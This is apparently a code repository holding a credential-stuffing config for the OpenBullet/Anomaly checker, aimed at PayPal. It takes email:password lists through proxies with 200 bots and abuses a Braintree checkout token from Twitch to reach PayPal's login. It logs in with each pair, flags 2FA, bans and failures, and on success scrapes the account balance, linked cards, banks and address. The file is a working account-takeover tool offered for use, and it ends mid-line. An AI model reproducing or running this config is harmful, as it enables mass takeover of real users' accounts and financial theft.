├── README.md └── paypalaccountcheck.anom /README.md: -------------------------------------------------------------------------------- 1 | # PaypalAccountCheckConfig 2 | Paypal Account Check Config Checker 3 | -------------------------------------------------------------------------------- /paypalaccountcheck.anom: -------------------------------------------------------------------------------- 1 | [SETTINGS] 2 | { 3 | "Name": "Paypal", 4 | "SuggestedBots": 200, 5 | "MaxCPM": 0, 6 | "LastModified": "2022-06-01T12:21:35.7765237+04:30", 7 | "AdditionalInfo": "", 8 | "Author": "script", 9 | "Version": "1.4.5 [Anomaly]", 10 | "IgnoreResponseErrors": false, 11 | "MaxRedirects": 8, 12 | "NeedsProxies": true, 13 | "OnlySocks": false, 14 | "OnlySsl": false, 15 | "MaxProxyUses": 0, 16 | "BanProxyAfterGoodStatus": false, 17 | "EncodeData": false, 18 | "AllowedWordlist1": "MailPass", 19 | "AllowedWordlist2": "", 20 | "DataRules": [], 21 | "CustomInputs": [], 22 | "CaptchaUrl": "", 23 | "Base64": "", 24 | "Grayscale": false, 25 | "RemoveLines": false, 26 | "RemoveNoise": false, 27 | "Dilate": false, 28 | "Threshold": 1.0, 29 | "DiffKeep": 0.0, 30 | "DiffHide": 0.0, 31 | "Saturate": false, 32 | "Saturation": 0.0, 33 | "Transparent": false, 34 | "Contour": false, 35 | "OnlyShow": false, 36 | "ContrastGamma": false, 37 | "Contrast": 1.0, 38 | "Gamma": 1.0, 39 | "Brightness": 1.0, 40 | "RemoveLinesMin": 0, 41 | "RemoveLinesMax": 0, 42 | "ForceHeadless": false, 43 | "AlwaysOpen": false, 44 | "AlwaysQuit": false, 45 | "DisableNotifications": false, 46 | "CustomUserAgent": "", 47 | "RandomUA": false, 48 | "CustomCMDArgs": "" 49 | } 50 | 51 | [SCRIPT] 52 | FUNCTION GenerateGUID -> VAR "guid" 53 | 54 | REQUEST POST "https://api.braintreegateway.com/merchants/vjgvc7g4y3fqps96/client_api/v1/paypal_hermes/setup_billing_agreement" AutoRedirect=FALSE 55 | CONTENT "{\"returnUrl\":\"https://checkout.paypal.com/web/3.50.0/html/paypal-redirect-frame.min.html?channel=dbe0308ec1e748beb9b346b243015dc8\",\"cancelUrl\":\"https://checkout.paypal.com/web/3.50.0/html/paypal-cancel-frame.min.html?channel=dbe0308ec1e748beb9b346b243015dc8\",\"offerPaypalCredit\":false,\"experienceProfile\":{\"brandName\":\"Twitch\",\"localeCode\":\"en_US\",\"noShipping\":\"true\",\"addressOverride\":false},\"braintreeLibraryVersion\":\"braintree/web/3.50.0\",\"_meta\":{\"merchantAppId\":\"www.twitch.tv\",\"platform\":\"web\",\"sdkVersion\":\"3.50.0\",\"source\":\"client\",\"integration\":\"custom\",\"integrationType\":\"custom\",\"sessionId\":\"\"},\"tokenizationKey\":\"production_syyh66jz_vjgvc7g4y3fqps96\"}" 56 | CONTENTTYPE "application/json" 57 | HEADER "Host: api.braintreegateway.com" 58 | HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) OPT/2.3.0 Mobile/15E148" 59 | HEADER "Accept: */*" 60 | HEADER "Accept-Language: en-CA,en-US;q=0.7,en;q=0.3" 61 | HEADER "Accept-Encoding: gzip, deflate, br" 62 | HEADER "Content-Type: application/json" 63 | HEADER "Origin: https://www.twitch.tv" 64 | HEADER "Connection: keep-alive" 65 | HEADER "Referer: https://www.twitch.tv/" 66 | HEADER "Pragma: no-cache" 67 | HEADER "Cache-Control: no-cache" 68 | 69 | PARSE "" LR "tokenId\":\"" "\"" -> VAR "token" 70 | 71 | REQUEST GET "https://www.paypal.com/agreements/approve?nolegacy=1&ba_token=" AutoRedirect=FALSE 72 | 73 | HEADER "Host: www.paypal.com" 74 | HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) OPT/2.3.0 Mobile/15E148" 75 | HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 76 | HEADER "Accept-Language: en-CA,en-US;q=0.7,en;q=0.3" 77 | HEADER "Accept-Encoding: gzip, deflate, br" 78 | HEADER "Connection: keep-alive" 79 | HEADER "Upgrade-Insecure-Requests: 1" 80 | HEADER "Pragma: no-cache" 81 | HEADER "Cache-Control: no-cache" 82 | 83 | PARSE "" LR "name=\"ctxId\" value=\"" "\"" -> VAR "ctx" 84 | 85 | PARSE "" LR "name=\"flowId\" value=\"" "\"" -> VAR "flowid" 86 | 87 | PARSE "" LR "sessionID\" value=\"" "\"" -> VAR "sesid" 88 | 89 | PARSE "" LR "name=\"_csrf\" value=\"" "\"" -> VAR "csrf" 90 | 91 | FUNCTION URLEncode "" -> VAR "csrf" 92 | 93 | PARSE "" LR "name=\"ads-client-context-data\" value=\"" "\"" -> VAR "ads" 94 | 95 | FUNCTION Replace """ "\"" "" -> VAR "ads" 96 | 97 | FUNCTION URLEncode "" -> VAR "ads" 98 | 99 | PARSE "" LR "requestUrl\" value=\"" "\"" -> VAR "rurl" 100 | 101 | FUNCTION Replace "&" "&" "" -> VAR "rurl" 102 | 103 | FUNCTION URLEncode "" -> VAR "rurl" 104 | 105 | PARSE "" LR "name=\"state\" value=\"" "\"" -> VAR "state" 106 | 107 | FUNCTION Replace "&" "&" "" -> VAR "state" 108 | 109 | FUNCTION URLEncode "" -> VAR "state" 110 | 111 | REQUEST POST "https://www.paypal.com/signin?intent=checkout&ctxId=&returnUri=%2Fwebapps%2Fhermes&state=&locale.x=en_EG&country.x=EG&flowId=" 112 | CONTENT "_csrf=&_sessionID=&locale.x=en_US&processSignin=main&fn_sync_data=%257B%2522SC_VERSION%2522%253A%25222.0.1%2522%252C%2522syncStatus%2522%253A%2522data%2522%252C%2522f%2522%253A%2522BA-3E445957PR253741S%2522%252C%2522s%2522%253A%2522UL_CHECKOUT_INPUT_PASSWORD%2522%252C%2522chk%2522%253A%257B%2522ts%2522%253A1653766726341%252C%2522eteid%2522%253A%255B-1699976063%252C-1098337827%252C-7241132972%252C-10609243089%252C6791019577%252C-1681913773%252Cnull%252Cnull%255D%252C%2522tts%2522%253A1620%257D%252C%2522dc%2522%253A%2522%257B%255C%2522screen%255C%2522%253A%257B%255C%2522colorDepth%255C%2522%253A24%252C%255C%2522pixelDepth%255C%2522%253A24%252C%255C%2522height%255C%2522%253A900%252C%255C%2522width%255C%2522%253A1600%252C%255C%2522availHeight%255C%2522%253A860%252C%255C%2522availWidth%255C%2522%253A1600%257D%252C%255C%2522ua%255C%2522%253A%255C%2522Mozilla%252F5.0%2520%28Windows%2520NT%25206.1%253B%2520Win64%253B%2520x64%29%2520AppleWebKit%252F537.36%2520%28KHTML%252C%2520like%2520Gecko%29%2520Chrome%252F102.0.5005.61%2520Safari%252F537.36%255C%2522%257D%2522%252C%2522d%2522%253A%257B%2522ts2%2522%253A%2522Di0%253A96Uh%253A390%2522%252C%2522rDT%2522%253A%252241758%252C41427%252C40987%253A31511%252C31183%252C30753%253A41756%252C41433%252C40999%253A36632%252C36312%252C35864%253A51999%252C51684%252C51246%253A21260%252C20950%252C20524%253A26382%252C26076%252C25631%253A41750%252C41447%252C41001%253A16133%252C15835%252C15386%253A51994%252C51699%252C51246%253A31502%252C31210%252C30755%253A46870%252C46582%252C46115%253A11008%252C10723%252C10254%253A36623%252C36340%252C35878%253A41744%252C41470%252C41011%253A46867%252C46597%252C46123%253A5883%252C5615%252C5140%253A31496%252C31237%252C30840%253A31495%252C31243%252C30759%253A21249%252C20999%252C20506%253A18326%252C26%2522%257D%257D&otpMayflyKey=23af23475d214aa68f480ecd2b2f1a53otpChlg&intent=checkout&ads-client-context=checkout&flowId=&&ads-client-context-data=&ctxId=&isValidCtxId=true&coBrand=eg&signUpEndPoint=%2Fwebapps%2Fmpp%2Faccount-selection&showCountryDropDown=true&hideOtpLoginCredentials=true&requestUrl=&forcePhonePasswordOptIn=&returnUri=%2Fwebapps%2Fhermes&state=&phoneCode=EG+%2B20&login_email=&login_password=&splitLoginContext=inputPassword&isCookiedHybridEmail=true&partyIdHash=ad9dbdb1f8934a622207cc893887f578c90c6a6da671f6a5c6dcf633b1259e30" 113 | CONTENTTYPE "application/x-www-form-urlencoded" 114 | HEADER "Host: www.paypal.com" 115 | HEADER "Connection: keep-alive" 116 | HEADER "Cache-Control: max-age=0" 117 | HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"102\", \"Google Chrome\";v=\"102\"" 118 | HEADER "sec-ch-ua-mobile: ?0" 119 | HEADER "sec-ch-ua-platform: \"Windows\"" 120 | HEADER "Upgrade-Insecure-Requests: 1" 121 | HEADER "Origin: https://www.paypal.com" 122 | HEADER "Content-Type: application/x-www-form-urlencoded" 123 | HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36" 124 | HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 125 | HEADER "Sec-Fetch-Site: same-origin" 126 | HEADER "Sec-Fetch-Mode: navigate" 127 | HEADER "Sec-Fetch-User: ?1" 128 | HEADER "Sec-Fetch-Dest: document" 129 | HEADER "Referer: https://www.paypal.com/checkoutnow?token=&useraction=commit" 130 | HEADER "Accept-Language: en-US,en;q=0.9" 131 | HEADER "Accept-Encoding: gzip, deflate" 132 | HEADER "Content-Length: 3067" 133 | 134 | PARSE "" LR "class=\"captcha-image\"> VAR "capurl" 135 | 136 | PARSE "" LR "name=\"_csrf\" value=\"" "\"" -> VAR "csrf" 137 | 138 | FUNCTION URLEncode "" -> VAR "csrf" 139 | 140 | PARSE "" LR "name=\"_requestId\" value=\"" "\"" -> VAR "rid" 141 | 142 | PARSE "" LR "name=\"_sessionID\" value=\"" "\"" -> VAR "sesid" 143 | 144 | PARSE "" LR "name=\"_hash\" value=\"" "\"" -> VAR "hash" 145 | 146 | PARSE "" LR "name=\"jsd\" value=\"" "\"" -> VAR "jsd" 147 | 148 | KEYCHECK 149 | KEYCHAIN Custom "2FACTOR" OR 150 | KEY "hallengesSection\">

Quick security check" 151 | KEYCHAIN Ban OR 152 | KEY "Security Challenge" 153 | KEYCHAIN Failure OR 154 | KEY "lert\">Some of your info didn't match. Try again, change the email address, or get help if you forgot your password" 155 | 156 | REQUEST GET "https://www.paypal.com/myaccount/summary" 157 | 158 | HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) OPT/2.3.0 Mobile/15E148" 159 | HEADER "Pragma: no-cache" 160 | HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 161 | HEADER "Host: www.paypal.com" 162 | HEADER "Accept-Language: en-CA,en-US;q=0.7,en;q=0.3" 163 | HEADER "Accept-Encoding: gzip, deflate, br" 164 | HEADER "Content-Type: application/x-www-form-urlencoded" 165 | HEADER "Origin: https://www.paypal.com" 166 | HEADER "Connection: keep-alive" 167 | HEADER "Upgrade-Insecure-Requests: 1" 168 | HEADER "Cache-Control: no-cache" 169 | 170 | PARSE "" LR "test_balance-tile-currency\">" "<" Recursive=TRUE -> VAR "balance" 171 | 172 | PARSE "" LR "=\"ppvx_text--md cw_tile-itemListHeader\">" "<" Recursive=TRUE -> VAR "cards" 173 | 174 | PARSE "" LR ">" "<" Recursive=TRUE -> VAR "carddata" 175 | 176 | PARSE "" LR "data-test-id=\"bankCard-itemListHeader\">" "<" Recursive=TRUE -> VAR "banks" 177 | 178 | IF "" Contains "You’re good to go – only one step left." 179 | 180 | FUNCTION Constant "True" -> CAP "Has PayPal Key" 181 | 182 | ENDIF 183 | IF "" Contains "Introducing a virtual card like no other" 184 | 185 | FUNCTION Constant "True" -> CAP "Has PayPal Key" 186 | 187 | ELSE 188 | 189 | FUNCTION Constant "False" -> CAP "Has PayPal Key" 190 | 191 | ENDIF 192 | 193 | FUNCTION Constant "Account Balance: | Cards: | Banks: " -> CAP "Cards" 194 | 195 | REQUEST GET "https://www.paypal.com/myaccount/settings/" 196 | 197 | HEADER "Host: www.paypal.com" 198 | HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) OPT/2.3.0 Mobile/15E148" 199 | HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 200 | HEADER "Accept-Language: en-CA,en-US;q=0.7,en;q=0.3" 201 | HEADER "Accept-Encoding: gzip, deflate, br" 202 | HEADER "Content-Type: application/x-www-form-urlencoded" 203 | HEADER "Origin: https://www.paypal.com" 204 | HEADER "Connection: keep-alive" 205 | HEADER "Upgrade-Insecure-Requests: 1" 206 | HEADER "Pragma: no-cache" 207 | HEADER "Cache-Control: no-cache" 208 | HEADER "TE: Trailers" 209 | 210 | PARSE "" LR "div class=\"address\"> VAR "a" 211 | 212 | PARSE "" LR "iv>" " VAR "address" 213 | 214 | PARSE "" LR "